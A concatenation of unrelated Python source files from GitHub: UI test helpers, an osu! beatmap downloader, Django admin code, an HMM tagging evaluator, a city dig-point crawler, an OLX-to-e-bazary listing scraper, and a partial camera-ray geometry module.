self.search_and_click(name)\n self.perform_entity_action('Copy')\n self.assign_value(common_locators['copy_name_input'], new_name)\n self.click(common_locators['copy_create_button'])\n\n def fetch_yum_content_repo_name(self, cv_name):\n \"\"\"Fetch associated yum repository info from selected content view.\"\"\"\n # find content_view\n self.search_and_click(cv_name)\n self.click(tab_locators['contentviews.tab_yum_content'])\n self.click(locators['contentviews.yum_repositories'])\n if self.wait_until_element(locators['contentviews.repo_name']):\n return self.find_element(locators['contentviews.repo_name']).text\n else:\n raise UINoSuchElementError(\n 'Could not get text attribute of repository locator')\n\n def validate_version_deleted(self, cv_name, version):\n \"\"\"Ensures the version is deleted from selected 
CV\"\"\"\n self.search_and_click(cv_name)\n removed_version = self.find_element(\n locators['contentviews.version_name'] % version)\n if removed_version:\n raise UIError(\n 'Selected version \"{0}\" was not deleted successfully'\n .format(version)\n )\n\n def validate_version_cannot_be_deleted(self, name, version):\n \"\"\"Check that version cannot be deleted from selected CV, because it\n has activation key or content host assigned to it\n \"\"\"\n self.search_and_click(name)\n self.click(locators['contentviews.version_dropdown'] % version)\n self.click(locators['contentviews.remove_ver'] % version)\n self.click(locators['contentviews.next_button'])\n self.wait_until_element(locators['contentviews.affected_button'])\n self.wait_for_ajax()\n self.wait_until_element(locators['contentviews.next_button'])\n self.wait_for_ajax()\n if self.is_element_enabled(locators['contentviews.next_button']):\n raise UIError(\n '\"Next\" button is enabled when it should not'\n )\n\n def version_search(self, name, version_name):\n \"\"\"Search for version in content view\"\"\"\n self.search_and_click(name)\n self.click(tab_locators['contentviews.tab_versions'])\n if not bz_bug_is_open(1400535):\n self.assign_value(\n common_locators['kt_table_search'], version_name)\n self.click(common_locators['kt_table_search_button'])\n return self.wait_until_element(\n locators['contentviews.version_name'] % version_name)\n\n def package_search(self, name, version_name, package_name,\n package_version=None):\n \"\"\"Search for package in content view version\"\"\"\n self.click(self.version_search(name, version_name))\n self.click(tab_locators['contentviews.tab_version_packages'])\n # type package version alongside with package name into search field if\n # it was passed\n self.assign_value(\n common_locators.kt_search,\n package_name if not package_version else\n 'name = \"{}\" and version = \"{}\"'.format(\n package_name,\n package_version,\n )\n )\n self.click(common_locators.kt_search_button)\n return self.wait_until_element(\n locators['contentviews.version.package_name'] % package_name)\n\n def fetch_version_packages(self, name, version_name):\n \"\"\"Return a list of all the packages inside specific content view\n version\"\"\"\n self.click(self.version_search(name, version_name))\n packages_tab_is_not_visible = self.wait_until_element_is_not_visible(\n tab_locators['contentviews.tab_version_packages'], timeout=3)\n packages = []\n if packages_tab_is_not_visible:\n return packages\n self.click(tab_locators['contentviews.tab_version_packages'])\n while True:\n names = self.find_elements(\n locators['contentviews.version.package_name'] % '')\n versions = self.find_elements(\n locators['contentviews.version.package_version'] % '')\n releases = self.find_elements(\n locators['contentviews.version.package_release'] % '')\n archs = self.find_elements(\n locators['contentviews.version.package_arch'] % '')\n for name, version, release, arch in zip(\n names, versions, releases, archs):\n packages.append(\n (name.text, version.text, release.text, arch.text))\n next_ = self.find_element(\n locators['contentviews.version.content_next_page'])\n if next_ is None:\n break\n self.click(next_)\n return packages\n\n def fetch_version_errata(self, name, version_name):\n \"\"\"Return a list of all the errata inside specific content view\n version\"\"\"\n self.click(self.version_search(name, version_name))\n errata_tab_is_not_visible = self.wait_until_element_is_not_visible(\n tab_locators['contentviews.tab_version_errata'], 
timeout=5)\n errata = []\n if errata_tab_is_not_visible:\n return errata\n self.click(tab_locators['contentviews.tab_version_errata'])\n while True:\n ids = self.find_elements(\n locators['contentviews.version.errata_id'] % '')\n titles = self.find_elements(\n locators['contentviews.version.errata_title'] % '')\n types = self.find_elements(\n locators['contentviews.version.errata_type'] % '')\n for id_, title, type_ in zip(ids, titles, types):\n errata.append((id_.text, title.text, type_.text))\n next_ = self.find_element(\n locators['contentviews.version.content_next_page'])\n if next_ is None:\n break\n self.click(next_)\n return errata\n\n def puppet_module_search(self, name, version, module_name):\n \"\"\"Search for puppet module element in content view version\"\"\"\n self.click(self.version_search(name, version))\n self.click(tab_locators.contentviews.tab_version_puppet_modules)\n self.assign_value(\n common_locators.kt_search,\n module_name\n )\n self.click(common_locators.kt_search_button)\n return self.wait_until_element(\n locators.contentviews.version.puppet_module_name % module_name)\n\n def remove_version_from_environments(self, name, version, environments):\n \"\"\"Remove a content view version from lifecycle environments\"\"\"\n # find and open the content view\n self.search_and_click(name)\n # click on the version remove button\n self.click(locators['contentviews.version_dropdown'] % version)\n self.click(locators.contentviews.remove_ver % version)\n # ensure, that remove Completely remove version check box is unchecked\n self.assign_value(\n locators.contentviews.completely_remove_checkbox,\n False\n )\n # get all the available lifecycle environments\n all_environments_elements = self.find_elements(\n locators.contentviews.delete_version_environments)\n all_environments = [\n env_element.text\n for env_element in all_environments_elements\n ]\n # select the needed ones that are in the environments arg\n # and unselected the ones not in environments arg\n for environment in all_environments:\n self.assign_value(\n (locators.contentviews.delete_version_environment_checkbox\n % environment),\n environment in environments\n )\n self.click(locators.contentviews.next_button)\n self.click(locators.contentviews.confirm_remove_ver)\n self.check_progress_bar_status(version)\n\n def get_cv_table_value(self, cv_name, column_name):\n \"\"\"Get value for specific table cell\n\n :param str cv_name: Name of content view to be fetched\n :param str column_name: Name of table column that needs to be fetched\n :return str: Cell value text\n \"\"\"\n element = self.search(cv_name)\n if element is None:\n raise UINoSuchElementError(\n 'Unable to find necessary cv \"{0}\".'.format(cv_name)\n )\n return self.wait_until_element(\n common_locators['kt_table_cell_value'] % (cv_name, column_name)\n ).text\n","repo_name":"sghai/robottelo","sub_path":"robottelo/ui/contentviews.py","file_name":"contentviews.py","file_ext":"py","file_size_in_byte":37189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"22317722499","text":"import json\nimport requests\nimport os\nimport string\nimport unicodedata\n\nvalidFilenameChars = \"-_.() %s%s\" % (string.ascii_letters, string.digits)\ndef removeDisallowedFilenameChars(filename):\n cleanedFilename = unicodedata.normalize('NFKD', filename).encode('ASCII', 'ignore')\n return ''.join(chr(c) for c in cleanedFilename if chr(c) in validFilenameChars)\n\nuser_id = int(input('Enter User ID from profile URL: 
'))\nnumber_of_maps = int(input('Enter top number of maps to download: '))\nosu_session_cookie = str(input('Enter osu session token, instructions in github readme: '))\n\nr = requests.get(f'https://osu.ppy.sh/users/{user_id}/beatmapsets/most_played?offset=0&limit={number_of_maps}')\ndata = r.json()\n\ntry:\n os.makedirs(\"./songs\")\nexcept FileExistsError:\n pass\n\nfor beatmap in data:\n beatmap_id = beatmap['beatmapset']['id']\n beatmap_title = removeDisallowedFilenameChars(str(beatmap['beatmapset']['title']))\n download_url = f\"https://osu.ppy.sh/beatmapsets/{beatmap_id}/download?noVideo=1\"\n \n print(f'\\n-------{beatmap_id}-------')\n print(download_url)\n print('Downloading beatmap: ' + str(beatmap_title))\n \n cookies = {'osu_session': osu_session_cookie}\n r = requests.get(download_url, cookies=cookies)\n\n with open(f'./songs/{beatmap_title}.osz', 'wb') as f: \n f.write(r.content)\n\n ","repo_name":"tomhepz/Osu-Most-Played-Downloader","sub_path":"OSUDownloader.py","file_name":"OSUDownloader.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"5249153501","text":"import decimal\nfrom django.contrib import admin\n\n\n# Register your models here.\nfrom .models import MyProduct\nfrom .models import Administrator\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.template.loader import get_template\nfrom django.core.mail import EmailMultiAlternatives\n\n#Function to send the mails to Admins when admins modifies a product\ndef send_email(mail,prod):\n context = {prod}\n template = get_template('email.html')\n content = template.render(context)\n email = EmailMultiAlternatives(\n 'Product Notification',\n 'Other admin modified a product',\n settings.EMAIL_HOST_USER,\n [mail]\n )\n \n email.attach_alternative(content, 'text/html')\n\n#Check if the request on products is POST to send notifications\ndef products(self,request):\n if request.method == 'POST':\n mail = MyAdministrator.get_queryset\n prod = self.name\n send_email(mail)\n return render(request, 'admin/products')\n\n#Add to wish list action, can you see at history of the products who user wished\ndef wishProducts(self,request, queryset):\n for myproduct in queryset:\n myproduct.wished = myproduct.wished + 1\n myproduct.save()\n self.message_user(request, \"Added at your wished list.\")\nwishProducts.short_description = 'I wished this'\n\nclass MyProductAdmin(admin.ModelAdmin):\n actions = [wishProducts, ] # <-- Add one extra list action function here to do a disccount\n list_display = ['name', 'prize']\n \n#Register our classes in admin\nadmin.site.register(MyProduct,MyProductAdmin)\n \n \n\n","repo_name":"KarenC7/ManageProduct","sub_path":"product/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29704788075","text":"import os\nimport numpy as np\nimport itertools\nfrom matplotlib import pyplot as plt\n\n\nclass Confusion:\n def __init__(self, tag_map):\n self.tag_map_len = len(tag_map)\n self.conf_matrix = np.zeros((self.tag_map_len, self.tag_map_len))\n tag_id_map = {k: v for v, k in tag_map.items()}\n label_name = []\n for i in range(len(tag_id_map)):\n label_name.append(tag_id_map[i])\n self.label_name = label_name\n\n def confusion_matrix(self, ground_truth, prediction):\n for g, p in zip(ground_truth, prediction):\n self.conf_matrix[g, p] += 1\n 
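        # Row index = ground-truth tag id, column index = predicted tag id,
        # so each row sums to that tag's support count. (Note this is the
        # transpose of the axis labels used in plot_confusion_matrix below.)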
return self.conf_matrix\n\n def plot_confusion_matrix(self, normalize=False, title='Confusion matrix', color_map=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n Input\n - normalize : True: display the percent, False: display the count\n \"\"\"\n if normalize:\n cm = np.asarray(self.conf_matrix, dtype=np.float)\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n else:\n cm = np.asarray(self.conf_matrix, dtype=np.int32)\n\n plt.figure(figsize=(30, 10))\n plt.imshow(cm, interpolation='nearest', cmap=color_map)\n plt.title(title, size=10)\n plt.colorbar()\n tick_marks = np.arange(len(self.label_name))\n plt.xticks(tick_marks, self.label_name, rotation=90, size=6)\n plt.yticks(tick_marks, self.label_name, size=6)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt), horizontalalignment=\"center\", size=7, color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.xlabel('Ground Truth', size=8)\n plt.ylabel('Predictions', size=8)\n\n plt.show()\n\n\ndef evaluation(output_file, ref_file, tag_map):\n confusion = Confusion(tag_map)\n\n with open(output_file) as output:\n out_lines = output.readlines()\n\n with open(ref_file) as reference:\n ref_lines = reference.readlines()\n\n if len(out_lines) != len(ref_lines):\n print('Error: No. of lines in output file and reference file do not match.')\n exit(0)\n\n total_tags = 0\n matched_tags = 0\n for i in range(0, len(out_lines)):\n out_line = out_lines[i].strip()\n out_tags = out_line.split(' ')\n ref_line = ref_lines[i].strip()\n ref_tags = ref_line.split(' ')\n total_tags += len(ref_tags)\n\n for j in range(0, len(ref_tags)):\n if out_tags[j] == ref_tags[j]:\n matched_tags += 1\n out_tag = out_tags[j].split('/')\n ref_tag = ref_tags[j].split('/')\n\n out_tag_id = tag_map[out_tag[len(out_tag)-1]]\n ref_tag_id = tag_map[ref_tag[len(ref_tag)-1]]\n confusion.conf_matrix[ref_tag_id][out_tag_id] += 1\n print(\"Accuracy={}%\".format(\"%.6f\" % ((float(matched_tags) / total_tags)*100)))\n confusion.plot_confusion_matrix()\n\n\nif __name__ == \"__main__\":\n Curr_Path = os.getcwd()\n Tag_map = {'CC': 0, 'CD': 1, 'DT': 2, 'EX': 3, 'FW': 4, 'IN': 5, 'JJ': 6, 'JJR': 7, 'JJS': 8, 'LS': 9,\n 'MD': 10, 'NN': 11, 'NNP': 12, 'NNPS': 13, 'NNS': 14, 'PDT': 15, 'POS': 16, 'PRP': 17, 'PRP$': 18, 'RB': 19,\n 'RBR': 20, 'RBS': 21, 'RP': 22, 'SYM': 23, 'TO': 24, 'UH': 25, 'VB': 26, 'VBD': 27, 'VBG': 28, 'VBN': 29,\n 'VBP': 30, 'VBZ': 31, 'WDT': 32, 'WP': 33, 'WP$': 34, 'WRB': 35, '#': 36, '$': 37, \"''\": 38, '-LRB-': 39,\n '-RRB-': 40, ', ': 41, '.': 42, ':': 43, '``': 44, ',': 45}\n\n Data_Path = os.path.join(os.path.abspath(os.path.dirname(Curr_Path)), \"data\")\n Output_File = os.path.join(Data_Path, \"sents.output_hmm\")\n Ref_File = os.path.join(Data_Path, \"sents.answer\")\n evaluation(Output_File, Ref_File, Tag_map)\n\n\n","repo_name":"Scott-Lu/cs5340_project","sub_path":"hmm/hmm/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":3981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11868151279","text":"# -*- coding: utf-8 -*-\n\nfrom app.constants import S_OK, S_ERR\nimport random\nimport math\nimport base64\nimport time\nimport ujson as json\nimport argparse\n\nfrom app.constants import *\nfrom app import cfg\nfrom app import 
util\n\nfrom app import cron\nfrom app.crawlers.new_taipei_city import crawler_new_taipei_city_dig_point\n\ndef cron_new_taipei_city_dig_point():\n params = {}\n while True:\n (error_code, params) = _get_params(params)\n\n cfg.logger.debug('error_code: %s params: %s', error_code, params)\n\n if error_code != S_OK:\n break\n\n results = crawler_new_taipei_city_dig_point.crawler_new_taipei_city_dig_point(params)\n\n _process_results(results)\n\n\ndef _get_params(params):\n if not params:\n server = cfg.config.get('web_server', 'http://106.187.101.193:5346')\n the_url = server + '/get/new_taipei_city_dig_point_next_year'\n http_result = util.http_multiget([the_url])\n\n next_year = util._int(util.json_loads(http_result.get(the_url, ''), ''), START_NEW_TAIPEI_CITY_DIG_POINT_YEAR)\n this_year = _get_this_year()\n\n next_year = min(next_year, this_year)\n\n cfg.logger.debug('after http_multiget: http_result: %s next_year: %s', http_result, next_year)\n\n return (S_OK, {'next_year': next_year})\n\n next_year = params.get('next_year', START_NEW_TAIPEI_CITY_DIG_POINT_YEAR)\n stop_year = _get_stop_year()\n\n if next_year == stop_year:\n return (S_ERR, {'next_year': next_year})\n\n next_year += 1\n\n return (S_OK, {'next_year': next_year})\n\n\ndef _get_this_year():\n the_datetime = util.get_datetime()\n\n return the_datetime.year\n\n\ndef _get_stop_year():\n return _get_this_year() + 1\n\n\ndef _process_results(results):\n data = results.get('data', [])\n cron.to_http_post(data)\n\n util.to_json(data, 'log.new_taipei_city_dig_point.json')\n\n\ndef parse_args():\n ''' '''\n parser = argparse.ArgumentParser(description='roadpin_backend')\n parser.add_argument('-i', '--ini', type=str, required=True, help=\"ini filename\")\n\n args = parser.parse_args()\n\n return (S_OK, args)\n\n\nif __name__ == '__main__':\n (error_code, args) = parse_args()\n\n cfg.init({\"ini_filename\": args.ini})\n\n cron_new_taipei_city_dig_point()\n","repo_name":"g0v/roadpin","sub_path":"roadpin_crawlers/app/cron/new_taipei_city/cron_new_taipei_city_dig_point.py","file_name":"cron_new_taipei_city_dig_point.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"9927789632","text":"\nimport os\nimport sys\nimport uuid\n\nimport urllib3\nfrom bs4 import BeautifulSoup\nimport random\n\nimport urllib.parse\n\nimport base64\nimport requests\n\nfrom PIL import Image\nfrom io import BytesIO\nimport time\n\n\n\ndef randFloat (mi, mx):\n base = random.randrange(9999, 999999) / random.randrange(1, 99)\n return base % (mx - mi) + mi\n\ndef get_as_base64(url):\n return base64.b64encode(requests.get(url).content)\n\ndef scrap_upload_and_link_images (http, imgs, offerId):\n totalCount = 0\n\n for img in imgs:\n # convert to base64\n # generate new UUID\n # upload\n # link\n\n if totalCount >= 5:\n break\n\n print(f'processing: {img}')\n imageId = str(uuid.uuid1())\n\n # get PIL image\n response = requests.get(img)\n pimg = None\n\n try:\n pimg = Image.open(BytesIO(response.content))\n except:\n continue\n\n # convert to base64\n\n buffered = BytesIO()\n \n # now resize, and do it smart\n W, H = pimg.size\n newSize = (0, 0)\n\n if W > H:\n newSize = (512, H * 512 // W)\n elif W == H:\n newSize = (512, 512)\n else:\n newSize = (W * 512 // H, 512)\n\n pimg = pimg.resize(newSize)\n pimg.save(buffered, format=\"JPEG\", quality=25, subsampling=4)\n b64 = base64.b64encode(buffered.getvalue())\n simg = 
f'data:image/jpeg;base64,{urllib.parse.quote_plus(b64)}'\n # print(f'{simg}') #TODO, MIGHT NEED WRAPR\n\n # now chunk it, and send throught\n\n packets = []\n for i in range(0, len(simg), 1980):\n packets.append(simg[i: i + 1980])\n\n packetId = 0\n for p in packets:\n url = f'http://e-bazary.ugu.pl/uploadImage.php?imageId={imageId}&packetId={packetId}&content={p}'\n r = requests.get(url)\n print(f'\\n{imageId} {packetId} resp = {r}')\n # print(f'url = {url}')\n # time.sleep(0.1)\n packetId = packetId + 1\n\n # subscribe image to offer\n requests.get(f'http://e-bazary.ugu.pl/addImageToOffer.php?offerId={offerId}&imageId={imageId}')\n totalCount = totalCount + 1\n\n\ndef scrap_from_link (http, link, kind):\n print(f'Scrapping from {link}')\n\n response = http.request('GET', f'https://www.olx.pl{link}')\n soup = BeautifulSoup(response.data)\n\n imgs = soup.find_all(\"img\", {\"class\": \"css-1bmvjcs\"})\n srcs = []\n\n # First, Pool Images\n\n for img in imgs:\n src = img.get('src')\n srcset = img.get('srcset')\n datasrc = img.get('data-src')\n\n if src is not None:\n srcs.append(src)\n\n if srcset is not None:\n srcs.append(srcset)\n\n if datasrc is not None:\n srcs.append(datasrc)\n\n srcs = list(dict.fromkeys(srcs))\n # print(f\"\\tfound images: {srcs}\")\n\n # Second, Pool Data\n titleHT = soup.find_all(\"h1\", {\"class\": \"css-r9zjja-Text\"})\n title = titleHT[0].string\n title = urllib.parse.quote_plus(title)\n\n descrHT = soup.find_all(\"div\", {\"class\": \"css-g5mtbi-Text\"})\n descr = descrHT[0].contents[0]\n descr = urllib.parse.quote_plus(descr)\n\n priceHT = soup.find_all(\"h3\", {\"class\": \"css-okktvh-Text\"})\n price = priceHT[0].contents[0]\n price = str(price).replace(' ', '')\n\n lat = randFloat(50.729088712331226, 53.936303826804135)\n lon = randFloat(15.678710715966309, 23.45703077399104)\n offerId = str(uuid.uuid1())\n userId = random.randrange(1, 100)\n\n print(f'offerId: {offerId}, Title: {title}, Descr: {descr}, Price {price}, Lat: {lat}, Lon: {lon}')\n\n #send info to server\n r2 = http.request('GET', f'http://e-bazary.ugu.pl/newOffer.php?userId={userId}&offerId={offerId}&kind={kind}&title={title}&descr={descr}&price={price}&lat={lat}&lon={lon}')\n \n # Now, Attempt to add images to this offer\n scrap_upload_and_link_images(http, srcs, offerId)\n\n\ndef scrape_from_search (http, info):\n print(f'Pooling {info[0]} from {info[1]}')\n # url = 'http://www.thefamouspeople.com/singers.php'\n \n response = http.request('GET', info[1])\n soup = BeautifulSoup(response.data)\n\n # now pool links to offers\n # but how?\n linx = soup.find_all(\"a\", {\"class\": \"css-rc5s2u\"})\n hrefs = []\n\n for link in linx:\n # now get is href\n # print(f'\\tfound: {link[\"href\"]}')\n hrefs.append(link['href'])\n\n for href in hrefs:\n scrap_from_link(http, href, info[0])\n\n\n\ndef main():\n print('began scraping!')\n\n http = urllib3.PoolManager()\n\n pages = []\n pages.append(('Elektronika', 'https://www.olx.pl/d/elektronika/telefony/'))\n pages.append(('Moda', 'https://www.olx.pl/d/moda/ubrania-meskie/?search%5Bfilter_enum_state%5D%5B0%5D=new'))\n pages.append(('Dom', 'https://www.olx.pl/d/dom-ogrod/wykonczenie-wnetrz/?search%5Bfilter_enum_state%5D%5B0%5D=new'))\n pages.append(('Elektronika', 'https://www.olx.pl/d/elektronika/komputery/'))\n pages.append(('Inne', 'https://www.olx.pl/d/uslugi-firmy/uslugi/'))\n pages.append(('Elektronika', 'https://www.olx.pl/d/elektronika/smartwatche-i-opaski/'))\n pages.append(('Dom', 
'https://www.olx.pl/d/dom-ogrod/meble/?search%5Bfilter_enum_state%5D%5B0%5D=new'))\n pages.append(('Elektronika', 'https://www.olx.pl/d/elektronika/gry-konsole/'))\n pages.append(('Motoryzacja', 'https://www.olx.pl/d/motoryzacja/samochody/'))\n pages.append(('Moda', 'https://www.olx.pl/d/moda/ubrania-damskie/?search%5Bfilter_enum_state%5D%5B0%5D=new'))\n pages.append(('Motoryzacja', 'https://www.olx.pl/d/motoryzacja/motocykle-skutery/'))\n\n # url = 'http://e-bazary.ugu.pl/dbgImg.php'\n # response = http.request('GET', url)\n\n # print(f'contents:\\n\"{response.data}\"\\n')\n\n for inf in pages:\n scrape_from_search(http, inf)\n\n\nif __name__ == '__main__':\n main()","repo_name":"quakcin/eBazary","sub_path":"webScraper/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":5434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1791193470","text":"import argparse\nfrom distutils.log import error\nimport os\nimport numpy as np\nfrom PIL import Image\n\nerror_bound = 1e-10 # error bound for computational instability in numpy\n\ncross = lambda x,y:np.cross(x.T,y.T).T # This is for bug resolution in numpy with pylance (related with type checking)\n # input : two n × 1 vector\n # output : n × 1 vector\n\ndef compute_ray_direction(R, K, h, w):\n # output : 3 × 1 vector\n raydir = R.T @ np.linalg.inv(K) @ np.array([w, h, 1]).reshape(-1,1)\n if np.sum(np.abs(raydir)) <= 3 * error_bound:\n # ray directions must not be zero vector\n raise Exception(\"ray direction cannot be zero. Something wrong\")\n return raydir\n\ndef dot_product_unit(a, b):\n # input : two n × 1 vector\n # output : 1 × 1 vector\n norm_a = np.linalg.norm(a)\n norm_b = np.linalg.norm(b)\n if norm_a <= error_bound or norm_b <= error_bound:\n return np.zeros((1,1))\n return np.dot((a/norm_a).T,(b/norm_b))\n\ndef check_parallel(r1, r2):\n # input : two n × 1 vector\n # output : r1 // r2 ?\n # Assumption(general) : The zero vector is parallel to all vectors\n n = r1.shape[0]\n ratio = None\n\n # First, check zero vectors\n if np.sum(np.abs(r1)) <= n * error_bound or np.sum(np.abs(r2)) <= n * error_bound:\n return True\n\n # Next, consider non-zero r1\n for i in range(n):\n if np.abs(r1[i]) <= error_bound:\n # if r1 // r2, r1[i] = 0 => r2[i] = 0 \n if np.abs(r2[i]) > error_bound:\n return False\n else:\n if ratio is None:\n ratio = r2[i] / r1[i]\n else:\n if np.abs(ratio - (r2[i] / r1[i])) > error_bound:\n return False\n return True\n\ndef get_point_of_intersection_between_two_lines(c1, r1, c2, r2):\n # Let consider c1 + λ1 * r1 = c2 + λ2 * r2\n # output : λ1, λ2\n\n # c1 + λ1 * r1 = c2 + λ2 * r2\n # <=> λ1 * r1 = c2 - c1 + λ2 * r2\n # λ2 * r2 = c1 - c2 + λ1 * r1\n # <=> λ1 * (r1 × r2) = (c2 - c1) × r2\n # λ2 * (r2 × r1) = (c1 - c2) × r1\n # <=> λ1 = dot((c2 - c1) × r2, (r1 × r2)) / ||(r1 × r2)||^2\n # λ2 = dot((c1 - c2) × r1, (r2 × r1)) / ||(r1 × r2)||^2\n # If two lines are skew, c1 + λ1 * r1 and c2 + λ2 * r2 each represent the closest point to the other line\n cross_norm = np.linalg.norm(cross(r1, r2))\n if cross_norm <= error_bound:\n # It means two lines are parallel or same\n return None, None\n lam1 = np.dot(cross(c2 - c1, r2).T, cross(r1, r2)) / np.square(cross_norm)\n lam2 = np.dot(cross(c1 - c2, r1).T, cross(r2, r1)) / np.square(cross_norm)\n return lam1, lam2\n\ndef make_infinite_point_of_ray(r):\n # input : n × 1 vector (direction)\n # output : n × 1 vector (point)\n inf_point = np.zeros(r.shape)\n r_sign = np.sign(r)\n r_inf = np.full(r.shape, 
np.inf)\n n = r.shape[0]\n \n for i in range(n):\n if np.abs(r[i]) <= error_bound:\n inf_point[i] = 0.0\n else:\n inf_point[i] = r_sign[i] * r_inf[i]\n return inf_point\n\ndef get_intersection_line_of_two_planes(c_b, n_b, c_t, n_t):\n # input : centers and normal vectors\n # output : starting point p, direction r\n\n # Check if two planes are same or parallel\n if check_parallel(n_b, n_t):\n return None, None\n \n # Now, the intersection line must exist\n # This line is parallel with n_t × n_b\n r = cross(n_t, n_b)\n \n # Then, we should get starting point p\n # p is on both planes\n # dot(n_t, p - c_t) = 0, dot(n_b, p - c_b) = 0 => dot(n_t, p) = dot(n_t, c_t), dot(n_b, p) = dot(n_b, c_b)\n # We know that r is not zero vector. Thus, there exits i s.t. ri ≠ 0, i = x, y, z\n # Assume that rx ≠ 0. Then, A = (n_ty n_tz) is invertible\n # (n_by n_bz)\n # Thus, (py, pz).T = A^-1 @ [dot(n_t, c_t), dot(n_b, c_b)].T where px = 0\n n = r.shape[0]\n p = np.zeros((n,1))\n for i in range(n):\n if np.abs(r[i]) <= error_bound:\n continue\n p[i] = 0\n A = np.vstack([np.vstack([n_t[0:i], n_t[i+1:]]).T, np.vstack([n_b[0:i], n_b[i+1:]]).T])\n B = np.array([np.dot(n_t.T, c_t), np.dot(n_b.T, c_b)]).reshape(2,1)\n p[(i+1)%3], p[(i+2)%3] = np.linalg.inv(A) @ B\n break\n \n return p, r\n\ndef get_intersection_of_two_planes(raydirs_base, raydirs_t, c_base, c_t):\n r_b1, r_b2 = raydirs_base\n r_t1, r_t2 = raydirs_t\n c_b = c_base\n intersection_list = []\n\n # We compute intersection of two planes(one of the base planes and one of the target planes) in this function\n # If we consider infinite points, we can represent intersection of two planes as at most two points\n # First, we can get the equation of two planes by using each center and ray directions\n # dot(n_t, (x,y,z) - c_t) = 0, dot(n_b, (x,y,z) - c_b) = 0 where n_t = r_t1 × r_t2, n_b = r_b1 × r_b2\n n_t = cross(r_t1, r_t2)\n n_b = cross(r_b1, r_b2)\n\n # Next, we obtain the intersection of two planes taking into account the relationship between the two planes\n # 1) n_t not // n_b\n # 2) n_t // n_b\n # 2-1) base plane = target plane\n # 2-2) base plane ≠ target plane\n if check_parallel(n_t, n_b):\n # 2)\n # Now, check whether c_t is on base plane\n if np.abs(np.dot(n_b.T, c_t - c_b)) <= error_bound:\n # 2-1)\n # Now we consider follows\n # 2-1-1) Check if each center is in both planes\n # 2-1-2) Check if each ray is in both planes\n # 2-1-3) Obtain intersection of each two lines\n # i) Check if two lines are parallel\n # ii) Check if λ >= 0\n # We only consider 2-1-3) now because the others are considered in `Is_point_in_ray_view` or `Is_ray_in_ray_view`\n for r_b in raydirs_base:\n for r_t in raydirs_t:\n lam1, lam2 = get_point_of_intersection_between_two_lines(c_b, r_b, c_t, r_t)\n # check computational stability\n if (lam1 is not None) and (lam1 >= -error_bound) and (lam2 is not None) and (lam2 >= -error_bound):\n inter_point_b = c_b + lam1 * r_b\n inter_point_t = c_t + lam2 * r_t\n if np.linalg.norm(inter_point_b - inter_point_t) <= error_bound:\n intersection_list.append(inter_point_b.copy())\n #else:\n # raise Exception(\"computational stability is not good\")\n else:\n # 2-2)\n # There is no intersection\n return intersection_list\n else:\n # 1)\n # Now, let consider intersection line of the two planes(It must exist)\n p, r = get_intersection_line_of_two_planes(c_b, n_b, c_t, n_t) # p, r are not None\n\n # We check the following for each plane\n # i) intersection of above line and two rays\n # ii) if each infinite point of above line is in the rays' 
plane? \n base_intersection = []\n target_intersection = []\n\n # i)\n for r_b in raydirs_base:\n lam1, lam2 = get_point_of_intersection_between_two_lines(p, r, c_b, r_b)\n # check λ2 >= 0\n # We don't have to consider the case where r and r_b are on the same line. This case has already been considered in `Is_point_in_ray_view` or `Is_ray_in_ray_view`\n if (lam1 is not None) and (lam2 is not None) and (lam2 >= -error_bound):\n # check computational stability\n inter_point = p + lam1 * r\n inter_point_b = c_b + lam2 * r_b\n if len(base_intersection) > 0:\n if np.linalg.norm(c_base - inter_point) <= error_bound:\n break\n base_intersection.append(inter_point.copy())\n '''\n if np.linalg.norm(inter_point_b - inter_point) <= error_bound:\n # if the intersection point is already computed, (i.e. intersection point is camera center) just skip\n if len(base_intersection) > 0:\n if np.linalg.norm(c_base - inter_point) <= error_bound:\n break\n base_intersection.append(inter_point.copy())\n '''\n #else:\n # raise Exception(\"computational stability is not good\")\n # ii)\n # Two infinite points : p + λ * r, where λ' = inf or -inf\n # At most one of the two infinite points is on the rays' plane\n # The following conditions should be satisfied\n # 1) cos(r, r1) > 0 or cos(r, r2) > 0 (because of FOV < 180 degree)\n # 2) cos(r1, r2) <= cos(r, r1) and cos(r1, r2) <= cos(r, r2)\n for r in (r, -r):\n r1_r2_cos = dot_product_unit(r_b1, r_b2)\n r_r1_cos = dot_product_unit(r, r_b1)\n r_r2_cos = dot_product_unit(r, r_b2)\n if r_r1_cos > error_bound or r_r2_cos > error_bound:\n if (r1_r2_cos <= r_r1_cos) and (r1_r2_cos <= r_r2_cos):\n inf_point = make_infinite_point_of_ray(r)\n base_intersection.append(inf_point.copy())\n \n # The same for the target ray\n for r_t in raydirs_t:\n lam1, lam2 = get_point_of_intersection_between_two_lines(p, r, c_t, r_t)\n # check λ2 >= 0\n # We don't have to consider the case where r and r_t are on the same line. This case has already been considered in `Is_point_in_ray_view` or `Is_ray_in_ray_view`\n if (lam1 is not None) and (lam2 is not None) and (lam2 >= -error_bound):\n # check computational stability\n inter_point = p + lam1 * r\n inter_point_t = c_t + lam2 * r_t\n if len(target_intersection) > 0:\n if np.linalg.norm(c_t - inter_point) <= error_bound:\n break\n target_intersection.append(inter_point.copy())\n '''\n if np.linalg.norm(inter_point_t - inter_point) <= error_bound:\n # if the intersection point is already computed, (i.e. 
